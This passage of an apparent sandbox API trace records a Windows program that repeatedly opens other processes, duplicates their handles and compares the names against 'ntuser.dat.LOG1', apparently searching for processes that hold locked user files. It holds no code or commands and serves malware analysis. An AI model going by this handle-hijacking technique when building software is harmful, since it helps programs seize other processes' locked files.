dwMilliseconds=0xfa) returned 0x0 [0152.207] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.207] CloseHandle (hObject=0x670) returned 1 [0152.207] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.207] CloseHandle (hObject=0x680) returned 1 [0152.207] CloseHandle (hObject=0x62c) returned 1 [0152.207] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7f4) returned 0x62c [0152.207] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.207] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.209] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.210] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.211] CloseHandle (hObject=0x670) returned 1 [0152.211] _wcsicmp (_Str1="\\Windows Photo Viewer", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.211] CloseHandle (hObject=0x680) returned 1 [0152.211] CloseHandle (hObject=0x62c) returned 1 [0152.211] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7dc) returned 0x62c [0152.211] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.211] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.211] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.212] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.212] CloseHandle (hObject=0x670) returned 1 [0152.212] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.212] CloseHandle (hObject=0x680) returned 1 [0152.212] CloseHandle (hObject=0x62c) returned 1 [0152.212] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7dc) returned 0x62c [0152.212] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.212] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.213] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.214] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.214] CloseHandle (hObject=0x670) returned 1 [0152.214] _wcsicmp (_Str1="\\Microsoft Sync Framework", _Str2="\\ntuser.dat.LOG1") returned -1 [0152.214] CloseHandle (hObject=0x680) returned 1 [0152.214] CloseHandle (hObject=0x62c) returned 1 [0152.214] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5c4) returned 0x62c [0152.214] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.214] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.215] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.215] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.215] CloseHandle (hObject=0x670) returned 1 [0152.215] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.215] CloseHandle (hObject=0x680) returned 1 [0152.216] CloseHandle (hObject=0x62c) returned 1 [0152.216] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5c4) returned 0x62c [0152.216] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.216] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.216] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.217] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.217] CloseHandle (hObject=0x670) returned 1 [0152.217] _wcsicmp (_Str1="\\Microsoft.NET", _Str2="\\ntuser.dat.LOG1") returned -1 [0152.217] CloseHandle (hObject=0x680) returned 1 [0152.217] CloseHandle (hObject=0x62c) returned 1 [0152.217] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x76c) returned 0x62c [0152.217] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.217] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.218] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.219] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.219] CloseHandle (hObject=0x670) returned 1 [0152.219] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.219] CloseHandle (hObject=0x680) returned 1 [0152.219] CloseHandle (hObject=0x62c) returned 1 [0152.219] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x76c) returned 0x62c [0152.219] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.219] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.220] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.220] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.220] CloseHandle (hObject=0x670) returned 1 [0152.220] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.220] CloseHandle (hObject=0x680) returned 1 [0152.220] CloseHandle (hObject=0x62c) returned 1 [0152.221] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x20c) returned 0x62c [0152.221] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.221] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.221] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.222] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.222] CloseHandle (hObject=0x670) returned 1 [0152.222] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.222] CloseHandle (hObject=0x680) returned 1 [0152.222] CloseHandle (hObject=0x62c) returned 1 [0152.222] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x20c) returned 0x62c [0152.222] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.222] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.223] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.224] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.224] CloseHandle (hObject=0x670) returned 1 [0152.224] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\ntuser.dat.LOG1") returned 7 [0152.224] CloseHandle (hObject=0x680) returned 1 [0152.224] CloseHandle (hObject=0x62c) returned 1 [0152.224] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x788) returned 0x62c [0152.224] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.224] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.229] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.230] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.230] CloseHandle (hObject=0x670) returned 1 [0152.230] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.230] CloseHandle (hObject=0x680) returned 1 [0152.230] CloseHandle (hObject=0x62c) returned 1 [0152.230] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x788) returned 0x62c [0152.230] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.230] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.231] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.232] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.232] CloseHandle (hObject=0x670) returned 1 [0152.232] _wcsicmp (_Str1="\\Windows Journal", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.232] CloseHandle (hObject=0x680) returned 1 [0152.232] CloseHandle (hObject=0x62c) returned 1 [0152.232] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x348) returned 0x62c [0152.232] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.232] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.233] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.234] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.234] CloseHandle (hObject=0x670) returned 1 [0152.234] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.234] CloseHandle (hObject=0x680) returned 1 [0152.234] CloseHandle (hObject=0x62c) returned 1 [0152.234] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x348) returned 0x62c [0152.234] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.234] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.235] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.235] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.235] CloseHandle (hObject=0x670) returned 1 [0152.235] _wcsicmp (_Str1="\\Google", _Str2="\\ntuser.dat.LOG1") returned -7 [0152.235] CloseHandle (hObject=0x680) returned 1 [0152.236] CloseHandle (hObject=0x62c) returned 1 [0152.236] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x310) returned 0x62c [0152.236] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.236] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.236] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.237] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.237] CloseHandle (hObject=0x670) returned 1 [0152.237] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.237] CloseHandle (hObject=0x680) returned 1 [0152.237] CloseHandle (hObject=0x62c) returned 1 [0152.237] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x310) returned 0x62c [0152.237] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.237] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.238] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.238] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.238] CloseHandle (hObject=0x670) returned 1 [0152.238] _wcsicmp (_Str1="\\Adobe", _Str2="\\ntuser.dat.LOG1") returned -13 [0152.238] CloseHandle (hObject=0x680) returned 1 [0152.239] CloseHandle (hObject=0x62c) returned 1 [0152.239] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x48c) returned 0x62c [0152.239] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.239] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.240] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.241] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.241] CloseHandle (hObject=0x670) returned 1 [0152.241] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.242] CloseHandle (hObject=0x680) returned 1 [0152.242] CloseHandle (hObject=0x62c) returned 1 [0152.242] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x48c) returned 0x62c [0152.242] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.242] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.242] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.243] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.243] CloseHandle (hObject=0x670) returned 1 [0152.243] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\ntuser.dat.LOG1") returned 7 [0152.243] CloseHandle (hObject=0x680) returned 1 [0152.243] CloseHandle (hObject=0x62c) returned 1 [0152.243] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x138) returned 0x62c [0152.243] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.243] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.244] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.245] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.245] CloseHandle (hObject=0x670) returned 1 [0152.245] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.245] CloseHandle (hObject=0x680) returned 1 [0152.245] CloseHandle (hObject=0x62c) returned 1 [0152.245] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x138) returned 0x62c [0152.245] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.245] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.246] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.246] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.247] CloseHandle (hObject=0x670) returned 1 [0152.247] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\ntuser.dat.LOG1") returned 7 [0152.247] CloseHandle (hObject=0x680) returned 1 [0152.247] CloseHandle (hObject=0x62c) returned 1 [0152.247] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x524) returned 0x62c [0152.247] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.247] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.248] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.248] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.248] CloseHandle (hObject=0x670) returned 1 [0152.248] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.248] CloseHandle (hObject=0x680) returned 1 [0152.248] CloseHandle (hObject=0x62c) returned 1 [0152.249] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x524) returned 0x62c [0152.249] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.249] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.249] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.250] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.250] CloseHandle (hObject=0x670) returned 1 [0152.250] _wcsicmp (_Str1="\\DVD Maker", _Str2="\\ntuser.dat.LOG1") returned -10 [0152.250] CloseHandle (hObject=0x680) returned 1 [0152.250] CloseHandle (hObject=0x62c) returned 1 [0152.250] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5a8) returned 0x62c [0152.250] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.250] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.251] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.251] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.251] CloseHandle (hObject=0x670) returned 1 [0152.251] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.251] CloseHandle (hObject=0x680) returned 1 [0152.252] CloseHandle (hObject=0x62c) returned 1 [0152.252] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5a8) returned 0x62c [0152.252] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.252] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.252] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.253] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.253] CloseHandle (hObject=0x670) returned 1 [0152.253] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.253] CloseHandle (hObject=0x680) returned 1 [0152.253] CloseHandle (hObject=0x62c) returned 1 [0152.253] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x340) returned 0x62c [0152.253] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.253] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.254] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.254] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.255] CloseHandle (hObject=0x670) returned 1 [0152.255] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.255] CloseHandle (hObject=0x680) returned 1 [0152.255] CloseHandle (hObject=0x62c) returned 1 [0152.255] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x340) returned 0x62c [0152.255] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.255] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.255] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.256] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.256] CloseHandle (hObject=0x670) returned 1 [0152.256] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.256] CloseHandle (hObject=0x680) returned 1 [0152.256] CloseHandle (hObject=0x62c) returned 1 [0152.256] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5b8) returned 0x62c [0152.256] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.256] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.257] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.258] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.258] CloseHandle (hObject=0x670) returned 1 [0152.258] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.258] CloseHandle (hObject=0x680) returned 1 [0152.258] CloseHandle (hObject=0x62c) returned 1 [0152.258] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x5b8) returned 0x62c [0152.258] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.258] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.259] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.259] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.260] CloseHandle (hObject=0x670) returned 1 